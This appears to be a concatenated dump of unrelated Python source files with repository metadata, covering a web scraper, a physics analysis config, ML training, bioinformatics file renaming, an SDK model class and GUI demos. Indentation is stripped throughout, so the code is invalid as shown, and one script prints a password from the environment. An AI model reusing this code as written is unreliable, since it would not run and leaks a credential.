url = "https://www.frobese.de/frorum/post/"
response = req.urlopen(url)
page = response.read()
soup = bs(page, "lxml")
# Navigation durchs DOM
content = soup.body.find(id="content")
elements = content.find_all(class_=re.compile("card"))
posts = elements[2:]
for tag in posts:
title = tag.h5
link = title.parent.get("href")
# Datensätze in die Datenbank schreiben
cur.execute("INSERT INTO index (title, link) VALUES (%s, %s)", (title.string, link))
print("==> %s eingefügt" % title.string)
# Verbindung zur Datenbank schließen
conn.commit()
conn.close()
|
[
"jvoland@frobese.de"
] |
jvoland@frobese.de
|
8aa933c8cf6d4abfc1c654e1c1bd0f83851f1fde
|
7536200883d4844220dc6fa49c5ec86c9c965a3f
|
/CMSSW_5_3_7_patch4/src/SingleTopPolarization/Analysis/python/top_step2_cfi.py
|
2049ebe98a93fb2307e0e0e997b442aaa2fe6b1f
|
[] |
no_license
|
sroecker/stpol
|
bfbb3240d7c33b8ec32d14cc69b802fffeb76995
|
aaffbca42b0cfe5899e0d7b90f62d24faa3b01f9
|
refs/heads/master
| 2020-12-24T23:54:12.257118
| 2013-09-06T14:06:43
| 2013-09-06T14:06:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,365
|
py
|
import FWCore.ParameterSet.Config as cms
def TopRecoSetup(process, leptonSource="goodSignalLeptons", bTagSource="highestBTagJet", untaggedJetSource="lowestBTagJet"):
#Reconstruct the 4-momentum of the top quark by adding the momenta of the b-jet, the neutrino and the charged lepton
#Combine the neutrino collections produced in the electron and muon paths, taking exactly 1 neutrino per event
process.recoNu = cms.EDProducer(
'CandRefCombiner',
sources=cms.untracked.vstring(["recoNuProducerMu", "recoNuProducerEle"]),
maxOut=cms.untracked.uint32(1),
minOut=cms.untracked.uint32(1)
)
process.recoTop = cms.EDProducer('SimpleCompositeCandProducer',
sources=cms.VInputTag(["recoNu", bTagSource, leptonSource])
)
process.topCount = cms.EDProducer('CollectionSizeProducer<reco::Candidate>',
src = cms.InputTag('recoTop')
)
process.cosTheta = cms.EDProducer('CosThetaProducer',
topSrc=cms.InputTag("recoTop"),
jetSrc=cms.InputTag(untaggedJetSource),
leptonSrc=cms.InputTag("goodSignalLeptons")
)
process.topRecoSequenceMu = cms.Sequence(
process.recoNuProducerMu *
process.recoNu *
process.recoTop *
process.topCount *
process.cosTheta
)
process.topRecoSequenceEle = cms.Sequence(
process.recoNuProducerEle *
process.recoNu *
process.recoTop *
process.topCount *
process.cosTheta
)
|
[
"joosep.pata@gmail.com"
] |
joosep.pata@gmail.com
|
4f8ee61efbd1aca6c91f56bfc3d5cd7c16207acd
|
a4a6ee8f949d0786f0f98ef4348c35ed38cf7e06
|
/functional5.py
|
f0e0f26f715324679eb80f487627063f5b28018d
|
[] |
no_license
|
deetchiga/pythonexercise
|
8eade8fa4277b5e84ca610d6ab144dbd20e37e98
|
f5fe4b22d3505160720f0345009f359e84089802
|
refs/heads/master
| 2020-07-12T20:26:42.846514
| 2019-08-29T11:14:04
| 2019-08-29T11:14:04
| 204,899,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
def finding():
x = 1
y = 2
str1= "w3resource"
print("Python Exercises")
print(finding.__code__.co_nlocals)
|
[
"deetchigasoundherraj1999@gmail.com"
] |
deetchigasoundherraj1999@gmail.com
|
10b8216b5a41db869e46425edcf8e64f02ebbb41
|
b9d134e329cecfc7306c8d0a05f451f8c2aa423e
|
/view_samples.py
|
786e7fe567d1f642cc27c195c5c64cb44844a21e
|
[
"Apache-2.0"
] |
permissive
|
feynmanliang/travelling-cluster-chain
|
477a114b6097b591fbec921fab2828bcb62d1bd5
|
2442178679e8ec29ac8532205dd9640f546f87fc
|
refs/heads/master
| 2020-03-09T16:22:33.718138
| 2018-05-08T23:37:00
| 2018-05-08T23:37:00
| 128,883,113
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
#!/usr/bin/env python3
#vim:set et sw=4 ts=8:
import scipy.io
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
if __name__ == '__main__':
num_workers = len(set(
x[:16] for x in glob('output/samples-*-*.mm')))
legend = []
for i in range(1,num_workers+1):
samples = []
for part in glob('output/samples-{}-*.mm'.format(i)):
samples.append(scipy.io.mmread(part))
samples = np.hstack(samples)
# samples = samples[:, np.arange(0, samples.shape[1]) % 15 == 0]
# plt.subplot(211)
# plt.plot(samples[0,:].T)
# plt.subplot(212)
# plt.subplot('22' + str(i))
plt.scatter(samples[0, :], samples[1, :], alpha=0.01)
legend.append("Worker {}".format(i))
plt.xlim(-1, 2)
plt.ylim(-3, 3)
plt.grid()
#plt.legend(legend)
plt.xlabel("$\\theta_1$")
plt.ylabel("$\\theta_2$")
plt.tight_layout()
plt.savefig('fig-samples.png')
|
[
"feynman.liang@gmail.com"
] |
feynman.liang@gmail.com
|
82ac8a96156917ad4b4d00554cd55e65464eed35
|
13ba3d799045937ef5518cca3d529272c565c41c
|
/ex/softmax/mnist.py
|
5e2e899623086716ff605a32119bd2c518fd2a5f
|
[
"MIT"
] |
permissive
|
phorsfall/ml
|
a3acbd4aba5e69990e675b39e0ce918577288abd
|
c5d5c90d84be9a8c817bb8053d71b097369c461d
|
refs/heads/master
| 2021-01-01T19:20:43.315154
| 2013-03-29T12:13:12
| 2013-03-29T18:32:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import os.path
import functools
import numpy as np
from ml import softmax, optimize, utils, mnist, data, meta
from ml import regularization as reg
DATA_PATH = os.path.expanduser('~/Development/ml/datasets')
train, valid = mnist.load_training_dataset(DATA_PATH)
batches = data.BatchIterator(train)
num_classes = mnist.NUM_CLASSES
num_dims = train.inputs.shape[1]
initial_params = softmax.initial_params(num_classes, num_dims)
weight_decay = None # reg.l2(1e-4)
epochs = 50
learning_rate = 0.1
momentum = 0
def f(params, data):
return softmax.cost(params, data.inputs, data.targets, weight_decay)
train_accuracy = functools.partial(softmax.accuracy,
train.inputs, train.labels)
valid_accuracy = functools.partial(softmax.accuracy,
valid.inputs, valid.labels)
train_error = utils.call_func_hook(train_accuracy)
valid_error = utils.call_func_hook(valid_accuracy)
def post_epoch(*args):
train_error(*args)
valid_error(*args)
params = optimize.sgd(f, initial_params, batches,
epochs, learning_rate,
momentum=momentum,
post_epoch=post_epoch)
|
[
"horsfallp@gmail.com"
] |
horsfallp@gmail.com
|
00c6cc2cc8f935a19060171f16301233960f6e86
|
67bd366aea00b56d3b21f3bf4fb71b1ac0ed059f
|
/scripts/rename_picard_fastq.py
|
88667b462a0cc99078e74356426d38ea723efbe8
|
[] |
no_license
|
AlaaALatif/bwa_pipeline
|
b6ec7f34ccbd231eec4f8a51528a60a2ae27c473
|
348632de11313a34e48810fca6e1987c758a2298
|
refs/heads/master
| 2023-04-21T16:39:59.553996
| 2021-05-05T00:59:01
| 2021-05-05T00:59:01
| 336,109,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
import glob
import shutil
import argparse
from path import Path
def rename_picard_fastq(fastq_filepaths: list, lane: str, destination_folder: str):
for fp in fastq_filepaths:
s_id = fp.split('/')[-1].split('.')[0]
_rnd = fp.split('/')[-1].split('.')[1]
if len(_rnd)==1:
rnd = f"R{fp.split('/')[-1].split('.')[1]}"
else:
rnd = fp.split('/')[-1].split('.')[1].replace('barcode_', 'I')
new_filename = f'{s_id}_S0_{lane}_{rnd}_001.fastq.gz'
new_fp = f'{destination_folder}/{new_filename}'
shutil.move(fp, new_fp)
# print(new_fp)
return 0
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-o', "--out-dir", action='store_false',
help="Output directory containing Picard's fastq files")
args = parser.parse_args()
# whether or not to include bam files in the release
out_dir = args.out_dir
if not Path.isdir(out_dir):
raise ValueError("The user-specified output directory (arg --out-dir) does not Exist. Operations aborted.")
l1_fastq_fps = glob.glob(f'{out_dir}/lane_1_tmp/*.fastq.gz')
if len(l1_fastq_fps)==0:
raise ValueError("The user-specified output directory (arg --out-dir) does not contain FASTQ files for lane 1. Operations aborted.")
rename_picard_fastq(l1_fastq_fps, lane='L001', destination_folder=f'{out_dir}/all_fastqs')
print(f"Lane 1 FASTQ files renamed and stored in all_fastqs folder")
l2_fastq_fps = glob.glob(f'{out_dir}/lane_2_tmp/*.fastq.gz')
if len(l2_fastq_fps)==0:
raise ValueError("The user-specified output directory (arg --out-dir) does not contain FASTQ files for lane 2. Operations aborted.")
rename_picard_fastq(l2_fastq_fps, lane='L002', destination_folder=f'{out_dir}/all_fastqs')
print(f"Lane 2 FASTQ files renamed and stored in all_fastqs folder")
|
[
"al.a.latif.94@gmail.com"
] |
al.a.latif.94@gmail.com
|
b4cc9dc13cf5cc068ee35ecbc4d4aaece2635b11
|
51f1da501607d29301aa28928704aa116832989c
|
/hello_cython/setup.py
|
bd219fd0e205bf35ee1f0b4d1bd972d13b86562f
|
[] |
no_license
|
alisure-ml/python-cython
|
8744b14dfcf6b4a190a333041e2a82c105a6c391
|
fa9ba45a165fdcb536b12df74979967fda04e463
|
refs/heads/master
| 2021-05-15T04:34:58.337856
| 2018-01-27T10:15:09
| 2018-01-27T10:15:09
| 118,907,881
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name="Hello pyx",
cmdclass={'build_ext': build_ext},
ext_modules=[Extension("hello",["hello.pyx"])]
)
|
[
"562282219@qq.com"
] |
562282219@qq.com
|
4ad4e2e1b2d66fb1ae290b0f303ce42f6117080a
|
d3c26a334817b2b4784d106f386a539ae3d7b466
|
/Week_04/Search_in_Rotated_Sorted_Array.py
|
2858d4207620477ae2d2cfbb6c0808332ca4f097
|
[] |
no_license
|
jj-leetcode/algorithm011-class01
|
9f33a7a26021da50f9edd0e410f2b8122830c196
|
2807728f373ed04060f86a99aa83900f860c0fdc
|
refs/heads/master
| 2022-11-24T12:55:18.612093
| 2020-07-26T09:52:51
| 2020-07-26T09:52:51
| 275,103,042
| 0
| 0
| null | 2020-06-26T07:55:19
| 2020-06-26T07:55:19
| null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Solution(object):
def search(self, nums, target):
l, r = 0, len(nums) - 1
while l <= r:
mid = l + (r-l) / 2
#print(mid, l, r)
if nums[mid] == target:
return mid
elif nums[mid] < target:
if nums[mid] < nums[r] and target <= nums[r] or nums[l] < nums[mid] and nums[l] < target:
l = mid + 1
else:
r = mid - 1
else:
if nums[mid] > nums[l] and target >= nums[l] or nums[r] > nums[mid] and nums[r] > target:
r = mid - 1
else:
l = mid + 1
return -1
t = 3
nums = [5,1,3]
print(Solution().search(nums, t))
|
[
"jj_leetcode@163.com"
] |
jj_leetcode@163.com
|
fb65e59bf2ec69a568e7d017fbfd2c6843b9e370
|
d2498344d98ebe2c1e899a73084a9c0b8cd6dbfa
|
/examples/trading_hours.py
|
9296470016f2f6dc8ad62d5a73fb0419517d0aa4
|
[] |
no_license
|
pablomedrano10/CS597-FinanceProject
|
0e2c6a6485385d7bf8e46b9a4c16977afa841116
|
7b64ba46e900618a18a228dc83727c84fe0b64ac
|
refs/heads/master
| 2020-03-21T06:41:02.715886
| 2018-07-26T03:01:50
| 2018-07-26T03:01:50
| 138,235,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 18 20:32:04 2018
@author: pablo
"""
import datetime
from os import environ
print(datetime.datetime.now().hour)
print(datetime.datetime.now().minute)
print(datetime.datetime.now())
print(environ.get('RH_USER'))
print(environ.get('RH_PASSWORD'))
|
[
"pablo.medrano@outlook.com"
] |
pablo.medrano@outlook.com
|
cbb0a64fd04f64315d2acf9c61fb5872b362e85f
|
6732c13c07ba62a397298795339ba0acad01ca27
|
/Coding/Sandbox source code/toddler_komal.py
|
d0398c05688a45d037ad8e329416ef57d6512c3c
|
[] |
no_license
|
eeyzl5/mobile-robot-localization-challenge
|
597e16a38a0db9fdebcbd171d8fe4cb6f4300aac
|
103259eaed61a63c3863b1276347e639c3e3270b
|
refs/heads/master
| 2020-06-20T00:34:55.569531
| 2019-07-15T05:46:05
| 2019-07-15T05:46:05
| 196,928,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,871
|
py
|
#!/usr/bin/env python
import time
import math
class Toddler:
__version = '2018a'
def __init__(self, IO):
print('[Toddler] I am toddler {} playing in a sandbox'.format(Toddler.__version))
self.camera = IO.camera.initCamera('pi', 'low')
self.getInputs = IO.interface_kit.getInputs
self.getSensors = IO.interface_kit.getSensors
self.mc = IO.motor_control
self.sc = IO.servo_control
self.hall_init()
self.poi_init()
self.odometer = 0
def control(self):
self.odometer = self.hall_counter()
# print('{}\t{}'.format("Hall Counter: ",self.hcounter))
# print('{}\t{}'.format("Odometer: ",self.odometer))
# print('{}\t{}'.format(self.getSensors(), self.getInputs()))
# print('{}\t{}'.format("IR sensor: ",self.getSensors()[6]))
# self.poi_detect()
# self.set_move(10)
vals_t = self.cal_angle( 1,5,"east")
# self.set_turn("left",vals_t[0])
self.sc.engage()
self.sc.setPosition(vals_t[1])
# self.cal_angle( 200,300,"north")
# self.set_turn("left",4)
# self.sc.engage()
# self.sc.setPosition(0 if self.getSensors()[0] >= 500 else 180)
# time.sleep(0.05)
def vision(self):
# image = self.camera.getFrame()
# self.camera.imshow('Camera', image)
time.sleep(0.05)
###################################################
# Hall Counter #
###################################################
def hall_init(self):
self.hcounter = 0
self.mc.stopMotors() # Stop the motor and get the first samples of hall sensors
self.hall_now = self.getInputs()[7]
time.sleep(0.5)
self.hall_pre = self.getInputs()[7]
def hall_counter(self):
self.hall_now = self.getInputs()[7]
self.diff = self.hall_now - self.hall_pre
self.hall_pre = self.hall_now
if self.diff != 0:
self.hcounter += 1
return (self.hcounter)*2.5 +2.2 # return the extact distance in cm
####################################################
# POI detection #
####################################################
def poi_init(self):
self.flag = 0
self.mc.setMotor(1,100) # turn on the light bulb
def poi_detect(self):
# both of the front light sensors should be on POI first
if self.getSensors()[0] > 40 and self.getSensors()[1] > 40:
self.flag = 1 # set a flag if so
if (self.getSensors()[2] > 15 or (self.getSensors()[0] <40 and self.getSensors()[1] < 40)) and self.flag == 1:
self.mc.stopMotors()
if self.flag != 1:
self.mc.setMotor(2,100)
self.mc.setMotor(4,100)
#####################################################
# Close loop Controls #
#####################################################
def set_move(self, number_of_counts):
number_of_counts = number_of_counts - (1 if self.hcounter < 5 else 2)
if self.hcounter > number_of_counts:
self.mc.stopMotors()
else:
self.mc.setMotor(2,100)
self.mc.setMotor(4,100)
def set_turn(self, direction, number_of_counts):
if direction == "left":
direction = 1
elif direction == "right":
direction = -1
else:
direction = 0
if self.hcounter > number_of_counts-1:
self.mc.stopMotors()
else:
self.mc.setMotor(2, direction*100)
self.mc.setMotor(4, (-1)*direction*100)
def cal_angle(self, segx,segy,dir):
num_rows = 420
num_col = 320
dir_ang = 0
x1 = 400
y1 = 170
est_loc = self.arena_map(segx, segy)
x = est_loc[0]
y = est_loc[1]
print('est x {}:'.format(x))
print('est y {}:'.format(y))
angle_vert = math.floor (math.degrees ( math.atan2(x1-x,y1-y)))
#v_ang= 300 / math.sqrt( ( (x1-x)*(x1-x) )+ ( (y1-y) * (y1-y) ) )
angle_hor = math.degrees ( math.atan2(300, math.sqrt( ( (x1-x)*(x1-x) )+ ( (y1-y) * (y1-y) ) )) )
print('vertical angle: {}.'.format(angle_vert))
print('horizontal angle: {}'.format(angle_hor))
if dir == "north":
dir_ang = math.floor((angle_vert)/20)
if dir == "south":
dir_ang = math.floor((angle_vert+180)/20)
if dir == "east":
dir_ang = math.floor((angle_vert+90)/20)
if dir == "west":
dir_ang = math.floor((angle_vert+270)/20)
print('normalized angle {}'.format(dir_ang))
estimated_angle = [dir_ang , angle_hor]
return estimated_angle
def arena_map(self, x,y):
seg_x = 85
seg_y = 64
#arena = [[0 for x in range(5)] for j in range(5)]
loc_seg_x = math.floor((x-1)*85 + (85/2))
loc_seg_y = math.floor((y-1)*64 + (64/2))
pos_est = [loc_seg_x, loc_seg_y]
return pos_est
|
[
"noreply@github.com"
] |
eeyzl5.noreply@github.com
|
593b489ee83bde16fcc5d65ffe4c72aad59d7770
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_attendance_records_of_his_meeting_request.py
|
624df1a0781f30c87349f05c3bc27ad2c9d89bdf
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,522
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchAttendanceRecordsOfHisMeetingRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'conf_uuid': 'str',
'offset': 'int',
'limit': 'int',
'search_key': 'str',
'user_uuid': 'str',
'x_authorization_type': 'str',
'x_site_id': 'str',
'accept_language': 'str'
}
attribute_map = {
'conf_uuid': 'confUUID',
'offset': 'offset',
'limit': 'limit',
'search_key': 'searchKey',
'user_uuid': 'userUUID',
'x_authorization_type': 'X-Authorization-Type',
'x_site_id': 'X-Site-Id',
'accept_language': 'Accept-Language'
}
def __init__(self, conf_uuid=None, offset=None, limit=None, search_key=None, user_uuid=None, x_authorization_type=None, x_site_id=None, accept_language=None):
"""SearchAttendanceRecordsOfHisMeetingRequest - a model defined in huaweicloud sdk"""
self._conf_uuid = None
self._offset = None
self._limit = None
self._search_key = None
self._user_uuid = None
self._x_authorization_type = None
self._x_site_id = None
self._accept_language = None
self.discriminator = None
self.conf_uuid = conf_uuid
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if search_key is not None:
self.search_key = search_key
if user_uuid is not None:
self.user_uuid = user_uuid
if x_authorization_type is not None:
self.x_authorization_type = x_authorization_type
if x_site_id is not None:
self.x_site_id = x_site_id
if accept_language is not None:
self.accept_language = accept_language
@property
def conf_uuid(self):
"""Gets the conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
会议UUID。
:return: The conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._conf_uuid
@conf_uuid.setter
def conf_uuid(self, conf_uuid):
"""Sets the conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
会议UUID。
:param conf_uuid: The conf_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._conf_uuid = conf_uuid
@property
def offset(self):
"""Gets the offset of this SearchAttendanceRecordsOfHisMeetingRequest.
指定返回的记录索引。该值必须大于等于0; 默认为0。
:return: The offset of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchAttendanceRecordsOfHisMeetingRequest.
指定返回的记录索引。该值必须大于等于0; 默认为0。
:param offset: The offset of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchAttendanceRecordsOfHisMeetingRequest.
指定返回的记录数,默认是20,最大500条。
:return: The limit of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchAttendanceRecordsOfHisMeetingRequest.
指定返回的记录数,默认是20,最大500条。
:param limit: The limit of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: int
"""
self._limit = limit
@property
def search_key(self):
"""Gets the search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
查询用来当作关键词的字符串。
:return: The search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._search_key
@search_key.setter
def search_key(self, search_key):
"""Sets the search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
查询用来当作关键词的字符串。
:param search_key: The search_key of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._search_key = search_key
@property
def user_uuid(self):
"""Gets the user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
用户的UUID(已在USG注册过的)。
:return: The user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._user_uuid
@user_uuid.setter
def user_uuid(self, user_uuid):
"""Sets the user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
用户的UUID(已在USG注册过的)。
:param user_uuid: The user_uuid of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._user_uuid = user_uuid
@property
def x_authorization_type(self):
"""Gets the x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
标识是否为第三方portal过来的请求。
:return: The x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._x_authorization_type
@x_authorization_type.setter
def x_authorization_type(self, x_authorization_type):
"""Sets the x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
标识是否为第三方portal过来的请求。
:param x_authorization_type: The x_authorization_type of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._x_authorization_type = x_authorization_type
@property
def x_site_id(self):
"""Gets the x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
用于区分到哪个HCSO站点鉴权。
:return: The x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._x_site_id
@x_site_id.setter
def x_site_id(self, x_site_id):
"""Sets the x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
用于区分到哪个HCSO站点鉴权。
:param x_site_id: The x_site_id of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._x_site_id = x_site_id
@property
def accept_language(self):
"""Gets the accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
语言。默认简体中文。 - zh-CN: 简体中文。 - en-US: 美国英文。
:return: The accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
:rtype: str
"""
return self._accept_language
@accept_language.setter
def accept_language(self, accept_language):
"""Sets the accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
语言。默认简体中文。 - zh-CN: 简体中文。 - en-US: 美国英文。
:param accept_language: The accept_language of this SearchAttendanceRecordsOfHisMeetingRequest.
:type: str
"""
self._accept_language = accept_language
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchAttendanceRecordsOfHisMeetingRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
069a8a88922ef656309b5d3a8cbab432170abd44
|
b3ed6d9a0d88a6c1ab795f89280276dbd252fc10
|
/python/examples/segnet-console.py
|
6d7c3ffe561d31504a87799b58923536528ff5be
|
[
"MIT"
] |
permissive
|
corenel/jetson-inference
|
d6619d8a41992d090eb8271a319c78b11055c71d
|
d9c2fe77cdccdfcdcc238bbd622b1222906804b1
|
refs/heads/master
| 2020-09-26T03:35:32.817777
| 2019-12-05T18:09:57
| 2019-12-05T18:09:57
| 226,155,474
| 1
| 0
|
NOASSERTION
| 2019-12-05T17:33:14
| 2019-12-05T17:33:13
| null |
UTF-8
|
Python
| false
| false
| 3,395
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import jetson.inference
import jetson.utils
import argparse
import ctypes
import sys
# parse the command line
parser = argparse.ArgumentParser(description="Segment an image using an semantic segmentation DNN.",
formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.segNet.Usage())
parser.add_argument("file_in", type=str, help="filename of the input image to process")
parser.add_argument("file_out", type=str, default=None, nargs='?', help="filename of the output image to save")
parser.add_argument("--network", type=str, default="fcn-resnet18-voc", help="pre-trained model to load, see below for options")
parser.add_argument("--visualize", type=str, default="overlay", choices=["overlay", "mask"], help="visualization mode for the output image, options are:\n 'overlay' or 'mask' (default: 'overlay')")
parser.add_argument("--filter-mode", type=str, default="linear", choices=["point", "linear"], help="filtering mode used during visualization, options are:\n 'point' or 'linear' (default: 'linear')")
parser.add_argument("--ignore-class", type=str, default="void", help="optional name of class to ignore in the visualization results (default: 'void')")
parser.add_argument("--alpha", type=float, default=120.0, help="alpha blending value to use during overlay, between 0.0 and 255.0 (default: 120.0)")
try:
opt = parser.parse_known_args()[0]
except:
print("")
parser.print_help()
sys.exit(0)
# load an image (into shared CPU/GPU memory)
img, width, height = jetson.utils.loadImageRGBA(opt.file_in)
# allocate the output image for the overlay/mask
img_output = jetson.utils.cudaAllocMapped(width * height * 4 * ctypes.sizeof(ctypes.c_float))
# load the segmentation network
net = jetson.inference.segNet(opt.network, sys.argv)
# process the segmentation network
net.Process(img, width, height, opt.ignore_class)
# print out timing info
net.PrintProfilerTimes()
# perform the visualization
if opt.file_out is not None:
if opt.visualize == 'overlay':
net.Overlay(img_output, width, height, opt.filter_mode)
elif opt.visualize == 'mask':
net.Mask(img_output, width, height, opt.filter_mode)
jetson.utils.cudaDeviceSynchronize()
jetson.utils.saveImageRGBA(opt.file_out, img_output, width, height)
|
[
"dustinf@nvidia.com"
] |
dustinf@nvidia.com
|
d29aaf4a31d5306834e221f9ebd7c2bd3ba9ca04
|
6a7563ad479e2c3d497d62e91f418d245ec658df
|
/scratch/andrei_surf.py
|
9dc279524c57ecc39c16fe9df14dcfb005e551ce
|
[] |
no_license
|
rosoba/rosoba
|
979901ab4858c1559e7ae9c214fb60ca71eec9b5
|
b26ae5b6b0f9b7027f306af7da9d1aff1c3e2a46
|
refs/heads/master
| 2021-01-19T18:36:04.107879
| 2016-01-20T09:48:48
| 2016-01-20T09:48:48
| 4,391,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,163
|
py
|
'''
Created on Oct 29, 2014
@author: rch
'''
# Copyright (c) 2007, Enthought, Inc.
# License: BSD Style.# Imports:
from traits.api \
import HasTraits, Trait, Range
from traitsui.api \
import Item, Group, View
# Define the demo class:
class CompoundEditorDemo (HasTraits):
""" Defines the main CompoundEditor demo class.
"""
# Define a compund trait to view:
compound_trait = Trait(1, Range(1, 6), 'a', 'b', 'c', 'd', 'e', 'f')
# Display specification (one Item per editor style):
comp_group = Group(
Item('compound_trait', style='simple', label='Simple'),
Item('_'),
Item('compound_trait', style='custom', label='Custom'),
Item('_'),
Item('compound_trait', style='text', label='Text'),
Item('_'),
Item('compound_trait', style='readonly', label='ReadOnly')
)
# Demo view:
view = View(
comp_group,
title='CompoundEditor',
buttons=['OK'],
resizable=True
)
# Create the demo:
demo = CompoundEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
demo.configure_traits()
|
[
"rostislav.chudoba@rwth-aachen.de"
] |
rostislav.chudoba@rwth-aachen.de
|
8d93f9ccfd2e6df3d1370888cc758aae9f78d8f9
|
bc441bb06b8948288f110af63feda4e798f30225
|
/console_gateway_sdk/model/inspection/collector_pb2.pyi
|
d3de42f7e2fc90213ed9384b7ba9194cefd9596f
|
[
"Apache-2.0"
] |
permissive
|
easyopsapis/easyops-api-python
|
23204f8846a332c30f5f3ff627bf220940137b6b
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
refs/heads/master
| 2020-06-26T23:38:27.308803
| 2020-06-16T07:25:41
| 2020-06-16T07:25:41
| 199,773,131
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,516
|
pyi
|
# @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
